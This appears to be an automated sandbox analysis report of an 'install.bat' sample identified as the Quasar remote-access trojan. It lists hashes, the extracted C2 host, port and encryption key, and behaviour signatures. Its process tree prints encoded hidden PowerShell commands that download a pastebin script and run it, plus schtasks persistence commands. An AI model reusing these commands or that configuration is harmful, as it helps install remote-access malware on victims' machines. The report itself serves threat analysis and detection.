Analysis
-
max time kernel
93s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 07:35
Static task
static1
Behavioral task
behavioral1
Sample
install.bat
Resource
win7-20240729-en
General
-
Target
install.bat
-
Size
595B
-
MD5
369f9a8a381c74880783423b98ed52c9
-
SHA1
3bd04c343b1c361d4e9383010cb0be2380c3dbdb
-
SHA256
c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d
-
SHA512
a139d4d0a7d3f0f6a28690df219cb14adf6a4f0a7ff365bb1e8142ddf8be136ea919e44e4f3108d8fcf344031bff127c701d91b2949501e83d26fdbd6b746c7b
Malware Config
Extracted
quasar
1.4.1
Office04
Dystopian-62863.portmap.host:62863
e1de8f9b-5a7a-4798-a6fb-c03591ef3442
-
encryption_key
8C1BB32BFD240218BA0CB04D65341FB1FDE1E001
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SubStart
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000a000000023cb4-60.dat family_quasar behavioral2/memory/4336-68-0x0000000000C20000-0x0000000000F44000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
flow pid Process 7 3872 powershell.exe 15 2336 powershell.exe 19 2336 powershell.exe -
pid Process 1152 powershell.exe 1848 powershell.exe 3872 powershell.exe 2336 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4336 RuntimeBroker.exe 2280 Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 6 pastebin.com 7 pastebin.com 18 raw.githubusercontent.com 19 raw.githubusercontent.com -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3672 schtasks.exe 2424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1152 powershell.exe 1152 powershell.exe 3872 powershell.exe 3872 powershell.exe 1848 powershell.exe 1848 powershell.exe 2336 powershell.exe 2336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 4336 RuntimeBroker.exe Token: SeDebugPrivilege 2280 Client.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2280 Client.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1616 wrote to memory of 1152 1616 cmd.exe 84 PID 1616 wrote to memory of 1152 1616 cmd.exe 84 PID 1152 wrote to memory of 2576 1152 powershell.exe 85 PID 1152 wrote to memory of 2576 1152 powershell.exe 85 PID 2576 wrote to memory of 3872 2576 cmd.exe 87 PID 2576 wrote to memory of 3872 2576 cmd.exe 87 PID 2576 wrote to memory of 1848 2576 cmd.exe 88 PID 2576 wrote to memory of 1848 2576 cmd.exe 88 PID 1848 wrote to memory of 2336 1848 powershell.exe 89 PID 1848 wrote to memory of 2336 1848 powershell.exe 89 PID 2336 wrote to memory of 4336 2336 powershell.exe 92 PID 2336 wrote to memory of 4336 2336 powershell.exe 92 PID 4336 wrote to memory of 3672 4336 RuntimeBroker.exe 96 PID 4336 wrote to memory of 3672 4336 RuntimeBroker.exe 96 PID 4336 wrote to memory of 2280 4336 RuntimeBroker.exe 98 PID 4336 wrote to memory of 2280 4336 RuntimeBroker.exe 98 PID 2280 wrote to memory of 2424 2280 Client.exe 99 PID 2280 wrote to memory of 2424 2280 Client.exe 99 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\install.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\install.bat' -ArgumentList 'am_admin'"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ASwBZAGQAUgByAFQAUwB4ACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAQQBtAC4AcABzADEA4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAEEAbQAuAHAAcwAxAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\Am.ps15⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "SubStart" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3672
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "SubStart" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:2424
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD52cd928baba5af07197e8ab4c3309ff7c
SHA1f282ff7f9323a5f5eab5479fd7c7e25776deac75
SHA25652638798f1f802fe7015092932c729461f2ba72fa3c906b443f7cedcc99f88c5
SHA512bea23897dd1f0a5aeb44f1197128e87bf1da2e5dad2d281425ed9b6bee0dd5e3b1898fe2e4eef659ed5a6bb13014ed57d3fd914e5b1247247d7fe2684fca69ef
-
Filesize
474B
MD526f3ed9427f9a33e13388303c4179845
SHA13cb3e6201b751e6aa020e90d816f10cb1e475969
SHA2563a8da751f93c7ac6d49ba42a8b2562ac1a444f5ec7e6c08248a8072bc84f29ee
SHA512336f23222b131f781111b0c5b2ee7d920932895e9ee4e8f50ce61ca0757fef3559a7ec408e80fe380e7354e8f3e87e0efa4afb25486a38febff607269df95f53
-
Filesize
3.1MB
MD5e9a138d8c5ab2cccc8bf9976f66d30c8
SHA1e996894168f0d4e852162d1290250dfa986310f8
SHA256e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3
SHA5125982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82